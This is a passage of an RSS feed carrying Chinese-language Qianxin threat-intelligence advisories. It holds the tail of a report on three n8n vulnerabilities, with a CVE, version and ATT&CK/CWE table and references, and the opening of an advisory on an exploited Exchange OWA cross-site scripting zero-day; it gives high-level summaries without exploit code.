start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报说明</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心持续监控全球范围内的漏洞披露和威胁活动。本次 n8n 漏洞事件中涉及的三个 CVE 均已纳入奇安信威胁情报库，具备以下检测能力：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">相关漏洞的规则匹配和告警</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">原型污染技术的特征检测</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">命令行注入行为的日志分析规则</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">当前未发现针对该漏洞的已知 APT 组织归因信息，但基于漏洞利用的便利性和平台战略价值，高级别威胁行为体（APT）可能在未来将其纳入攻击工具库。建议安全团队保持关注。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">IOC 与关联指标</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">本次披露的漏洞为设计缺陷类漏洞，未涉及传统意义上的失陷指标（IOC），如恶意文件哈希、恶意域名等。核心关注点应聚焦于受影响的版本范围和漏洞类型，而非文件级指标。</span></p><table style="overflow-wrap:break-word;color:rgb(43, 48, 59);border-collapse:collapse;margin:1.5em 8px;font-family:-apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size:16px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-transform:none;widows:2;word-spacing:0px;-webkit-text-stroke-width:0px;white-space:normal;text-decoration-thickness:initial;text-decoration-style:initial;text-decoration-color:initial;width:551px;"><thead><tr style="overflow-wrap: break-word;"><th data-colwidth="161" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">实体/指标</span></p></th><th data-colwidth="111" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">类型</span></p></th><th data-colwidth="279" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">说明</span></p></th></tr></thead><tbody><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-44789</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">HTTP Request 节点原型污染，RCE</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-44790</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Git 节点命令行注入，任意文件读取</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE-2026-44791</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">XML 节点补丁绕过，原型污染延续</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">n8n &lt; 1.123.43</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">版本范围</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">主线版本受影响</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">n8n &lt; 2.20.7</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">版本范围</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2.x 分支受影响</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">n8n &lt; 2.22.1</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">版本范围</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2.x 分支受影响</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1203</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ATT&amp;CK</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用软件漏洞执行代码</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1059</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">ATT&amp;CK</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">命令与脚本解释器</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CWE-1321</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CWE</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">原型污染</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CWE-88</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CWE</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">命令行参数注入</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="161" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Jubke</span></p></td><td data-colwidth="111" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">研究人员</span></p></td><td data-colwidth="279" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">漏洞发现者</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">参考来源</span></h2><ul class="list-paddingleft-1"><li style="color:#3e3e3e;"><code><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(62, 62, 62);"><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-wrwr-h859-xh2r" target="_blank">https://github.com/n8n-io/n8n/security/advisories/GHSA-wrwr-h859-xh2r</a></span></span></code></li><li style="color:#3e3e3e;"><code><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(62, 62, 62);"><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-57g9-58c2-xjg3" target="_blank">https://github.com/n8n-io/n8n/security/advisories/GHSA-57g9-58c2-xjg3</a></span></span></code></li><li style="color:#3e3e3e;"><code><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(62, 62, 62);"><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-c8xv-5998-g76h" target="_blank">https://github.com/n8n-io/n8n/security/advisories/GHSA-c8xv-5998-g76h</a></span></span></code></li><li style="color:#3e3e3e;"><code><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(62, 62, 62);"><a href="https://1275.ru/vulnerability/kriticheskie-uyazvimosti-v-platforme-avtomatizatsii-n8n-pozvolyayut-udalenno-vypolnyat-kod-cherez-tsepochku-atak_25976" target="_blank">https://1275.ru/vulnerability/kriticheskie-uyazvimosti-v-platforme-avtomatizatsii-n8n-pozvolyayut-udalenno-vypolnyat-kod-cherez-tsepochku-atak_25976</a></span></span></code></li><li style="color:#3e3e3e;"><code><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(62, 62, 62);"><a href="https://www.cybersecuritynews.com/n8n-vulnerabilities-rce" target="_blank">https://www.cybersecuritynews.com/n8n-vulnerabilities-rce</a></span></span></code></li><li style="color:#3e3e3e;"><code><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(62, 62, 62);"><a href="https://www.thedailytechfeed.com/n8n-critical-vulnerability-rce" target="_blank">https://www.thedailytechfeed.com/n8n-critical-vulnerability-rce</a></span></span></code></li><li style="color:#3e3e3e;"><code><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(62, 62, 62);"><a href="https://www.cyberwebspider.com/n8n-security-vulnerabilities" target="_blank">https://www.cyberwebspider.com/n8n-security-vulnerabilities</a></span></span></code></li></ul><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=beae48ff&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518838%26idx%3D1%26sn%3Da33e7f05cd5a946c51b0ff0fe8caa3eb">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 19 May 2026 10:50:00 +0800</pubDate>
    </item>
    <item>
      <title>紧急！微软Exchange Server新高危XSS漏洞（CVE-2026-42897）已被利用执行攻击</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518833&amp;idx=1&amp;sn=2a77ea8001191d2debe33540842c66e4</link>
      <description>微软于近期披露了一个影响广泛的高危零日漏洞CVE-2026-42897，该漏洞已被确认在野外被积极利用。</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-05-18 11:32</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=97630a36&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq856YXUsm4nrXicmUEIg2A3PngLkialEib1ngpPG6kuL1KolaqjzYCKw37ibdG109WqoKfDaAo9B58khqF6KKE1mfkiboDukBLgKcrc%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>微软于近期披露了一个影响广泛的高危零日漏洞CVE-2026-42897，该漏洞已被确认在野外被积极利用。</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">事件概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">微软于近期披露了一个影响广泛的高危零日漏洞</span><span style="overflow-wrap: break-word;"><span leaf="">CVE-2026-42897</span></span><span leaf="">，该漏洞已被确认在野外被积极利用。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这个漏洞来得猝不及防——就在微软发布包含137个漏洞修复的补丁星期二更新后仅仅两天，安全研究人员便发现了这个此前未知的零日漏洞。漏洞影响Microsoft Exchange Server的多个版本，包括Subscription Edition、2016版和2019版的本地部署版本。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心监测显示，该漏洞的CVSS评分高达8.1（高危），属于典型的欺骗类漏洞，同时具备跨站脚本(XSS)攻击能力。攻击者无需特殊权限，即可通过精心构造的恶意邮件触发漏洞，在目标用户的浏览器上下文中执行任意JavaScript代码。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">关键结论</span></strong><span leaf="">：虽然该漏洞目前尚未被CISA纳入已知被利用漏洞（KEV）目录，但微软已明确表示存在活跃的野外利用，这使得该漏洞的紧迫程度不容低估。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">技术分析与攻击链路</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞根因</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span style="overflow-wrap: break-word;"><span leaf="">CVE-2026-42897</span></span><span leaf="">的技术本质是</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">输入验证不当导致的跨站脚本漏洞</span></strong><span leaf="">。问题出在Exchange Server的Outlook Web Access（OWA）组件中——当Web应用程序生成页面时，对用户可控输入的过滤和中和处理存在缺陷。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">从攻击链角度分析，该漏洞属于MITRE ATT&amp;CK框架中的以下技术类别：</span></p><ul 